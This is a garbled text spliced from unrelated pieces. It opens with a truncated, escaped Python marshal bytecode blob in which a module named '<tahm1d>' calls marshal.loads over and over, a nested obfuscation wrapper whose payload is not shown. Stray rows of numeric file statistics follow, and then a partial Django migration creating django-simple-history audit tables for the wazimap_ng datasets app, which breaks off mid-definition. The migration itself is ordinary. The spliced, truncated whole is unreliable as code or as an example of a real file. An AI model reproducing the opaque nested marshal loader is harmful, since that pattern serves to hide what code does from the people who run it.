0(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\
x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\
x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x0
0\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x0
1(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x
00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x
00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00
\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x08\x00\x00\x00<tahm1d>t\x08\x00\x00\x00<module>\x01\x00\x00\x00s\x02\x00\x00\x00\x0c\x01')
| 29,141.333333
| 87,408
| 0.749073
| 19,605
| 87,424
| 3.336853
| 0.041265
| 0.402819
| 0.332105
| 0.293126
| 0.845595
| 0.806081
| 0.760742
| 0.733243
| 0.721656
| 0.698773
| 0
| 0.402628
| 0.007538
| 87,424
| 2
| 87,409
| 43,712
| 0.351351
| 0
| 0
| 0
| 0
| 6
| 0.826901
| 0.769834
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.5
| 0.5
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 20
|
25d029ea726c72c60feb31b3264d593ff437ceb7
| 11,126
|
py
|
Python
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 11
|
2019-12-31T20:27:22.000Z
|
2022-03-10T03:55:38.000Z
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 164
|
2020-02-06T15:02:22.000Z
|
2022-03-30T22:42:00.000Z
|
wazimap_ng/datasets/migrations/0125_historicaldataset_historicaldatasetfile_historicalgeographyhierarchy_historicalgroup_historicalindic.py
|
OpenUpSA/wazimap-ng
|
57334e6da319482aa4ff2fde86c4ec27c30ee8d6
|
[
"Apache-2.0"
] | 16
|
2020-01-03T20:30:24.000Z
|
2022-01-11T11:05:15.000Z
|
# Generated by Django 2.2.24 on 2021-11-10 08:23
from django.conf import settings
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
import tinymce.models
import wazimap_ng.datasets.models.upload
class Migration(migrations.Migration):
    """Create audit-trail tables for django-simple-history.

    Each HistoricalX model mirrors its concrete model's fields and adds the
    standard simple_history bookkeeping columns: history_id (PK),
    history_date, history_change_reason, history_type (+/~/-), and
    history_user (FK to the swappable user model).  Foreign keys use
    db_constraint=False / DO_NOTHING so history rows survive deletion of
    the referenced objects.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('profile', '0049_auto_20211007_1056'),
        ('django_q', '0014_schedule_cluster'),
        ('datasets', '0124_auto_20211009_1012'),
    ]

    operations = [
        # History table for Universe.
        migrations.CreateModel(
            name='HistoricalUniverse',
            fields=[
                # 'id' mirrors the concrete PK but is a plain indexed column here;
                # 'history_id' is the actual primary key of the history table.
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('filters', django.contrib.postgres.fields.jsonb.JSONField()),
                ('label', models.CharField(max_length=100)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical universe',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for Indicator (displayed as "Variable" in the admin).
        migrations.CreateModel(
            name='HistoricalIndicator',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('groups', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=150), blank=True, default=list, size=None)),
                ('name', models.CharField(max_length=50)),
                ('subindicators', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=list, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                # Unconstrained FK: keeps the history row even if the Dataset is deleted.
                ('dataset', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Dataset')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('universe', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Universe')),
            ],
            options={
                'verbose_name': 'historical Variable',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for Group (displayed as "SubindicatorsGroup").
        migrations.CreateModel(
            name='HistoricalGroup',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('name', models.CharField(max_length=100)),
                ('subindicators', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=list)),
                ('can_aggregate', models.BooleanField(default=True)),
                ('can_filter', models.BooleanField(default=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('dataset', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Dataset')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical SubindicatorsGroup',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for GeographyHierarchy.
        migrations.CreateModel(
            name='HistoricalGeographyHierarchy',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('name', models.CharField(max_length=50)),
                ('description', tinymce.models.HTMLField(blank=True)),
                ('configuration', django.contrib.postgres.fields.jsonb.JSONField(blank=True, default=dict)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('root_geography', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='datasets.Geography')),
            ],
            options={
                'verbose_name': 'historical geography hierarchy',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for DatasetFile.  'document' is stored as TextField here
        # (history tables flatten FileField to its path) but keeps the upload
        # validators of the concrete model.
        migrations.CreateModel(
            name='HistoricalDatasetFile',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('document', models.TextField(help_text='\n Uploaded document should be less than 3000.0 MiB in size and \n file extensions should be one of xls, xlsx, csv.\n ', max_length=100, validators=[django.core.validators.FileExtensionValidator(allowed_extensions=['xls', 'xlsx', 'csv']), wazimap_ng.datasets.models.upload.file_size])),
                ('name', models.CharField(max_length=60)),
                ('dataset_id', models.PositiveSmallIntegerField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
                ('task', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='django_q.Task')),
            ],
            options={
                'verbose_name': 'historical dataset file',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
        # History table for Dataset.
        migrations.CreateModel(
            name='HistoricalDataset',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('updated', models.DateTimeField(blank=True, editable=False)),
                ('name', models.CharField(max_length=60)),
                ('groups', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(max_length=200), blank=True, default=list, size=None)),
                ('permission_type', models.CharField(choices=[('private', 'Private'), ('public', 'Public')], default='private', max_length=32)),
                ('content_type', models.CharField(choices=[('quantitative', 'Quantitative'), ('qualitative', 'Qualitative')], default='quantitative', max_length=32)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
